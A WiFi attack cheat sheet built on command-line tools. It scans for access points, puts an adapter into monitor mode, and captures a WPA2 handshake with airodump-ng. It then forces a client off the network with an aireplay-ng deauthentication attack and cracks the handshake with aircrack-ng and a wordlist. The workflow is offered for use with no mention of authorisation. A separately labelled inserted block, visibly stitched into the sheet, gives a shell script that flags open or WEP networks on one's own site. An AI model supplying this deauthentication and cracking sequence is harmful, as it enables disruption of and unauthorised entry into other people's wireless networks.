WiFi Cheat Sheet

nmcli device status

Prints the connected wireless adapters

iwlist [adapter] scan

Scans for local APs (access points)

iwlist [adapter] scan | egrep 'Address|ESSID'

Narrows down output of previous scan

airmon-ng start [adapter]

Starts monitor mode on selected adapter

iwconfig | grep 'Monitor'

Shows the monitor mode device

airodump-ng [adapter]

Shows the access points and devices you can capture
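
The iwlist scan and egrep steps above, taken further as an added example (not part of the original cheat sheet): a shell function that turns scan output into one line per access point and flags open or WEP networks when auditing your own site. The sample scan text, the function names and the "key on without a WPA IE means WEP" heuristic are assumptions of this example.

```shell
# Constructed sample of `iwlist [adapter] scan` output (not from a real network).
sample_scan() {
cat <<'EOF'
wlan0     Scan completed :
          Cell 01 - Address: 02:00:00:AA:BB:01
                    Channel:6
                    Frequency:2.437 GHz (Channel 6)
                    Quality=60/70  Signal level=-50 dBm
                    Encryption key:on
                    ESSID:"office-main"
                    IE: IEEE 802.11i/WPA2 Version 1
          Cell 02 - Address: 02:00:00:AA:BB:02
                    Channel:11
                    Encryption key:off
                    ESSID:"guest"
          Cell 03 - Address: 02:00:00:AA:BB:03
                    Channel:1
                    Encryption key:on
                    ESSID:"old printer"
EOF
}

# summarize_scan: read iwlist scan text on stdin and print one tab-separated
# line per cell: BSSID, channel, ESSID, security (OPEN/WEP/WPA/WPA2).
# Heuristic (assumption): "Encryption key:on" with no WPA/WPA2 IE is treated as WEP.
summarize_scan() {
    awk '
    function emit() {
        if (bssid != "") printf "%s\t%s\t%s\t%s\n", bssid, chan, essid, sec
    }
    /Cell [0-9]+ - Address:/ { emit(); bssid = $NF; chan = "?"; essid = ""; sec = "OPEN"; next }
    /^[ \t]*Channel:/        { sub(/^[ \t]*Channel:/, ""); chan = $0; next }
    /Encryption key:on/      { if (sec == "OPEN") sec = "WEP"; next }
    /ESSID:"/                { sub(/^[ \t]*ESSID:"/, ""); sub(/"[ \t]*$/, ""); essid = $0; next }
    /IE: .*WPA2/             { sec = "WPA2"; next }
    /IE: .*WPA Version/      { if (sec != "WPA2") sec = "WPA"; next }
    END { emit() }
    '
}

# weak_networks: keep only the cells reported as open or WEP.
weak_networks() {
    summarize_scan | awk -F '\t' '$4 == "OPEN" || $4 == "WEP"'
}

sample_scan | summarize_scan
```

On a live system, replace sample_scan with iwlist [adapter] scan piped into summarize_scan or weak_networks.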

Capture WPA2

To capture packets from an access point use the following command:

airodump-ng -c [channel of access point] --bssid [access point] -w [filename] [adapter]

Leave this running in its own terminal

To perform a deauthentication attack use the following command in a second terminal window:

aireplay-ng -0 1 -a [accesspoint] -c [client address] [adapter]

Check the first terminal or tab; we should now have captured the handshake

To use a word list against the captured handshake use the following command:

aircrack-ng -0 -w [wordlist] [captured filename(.cap)]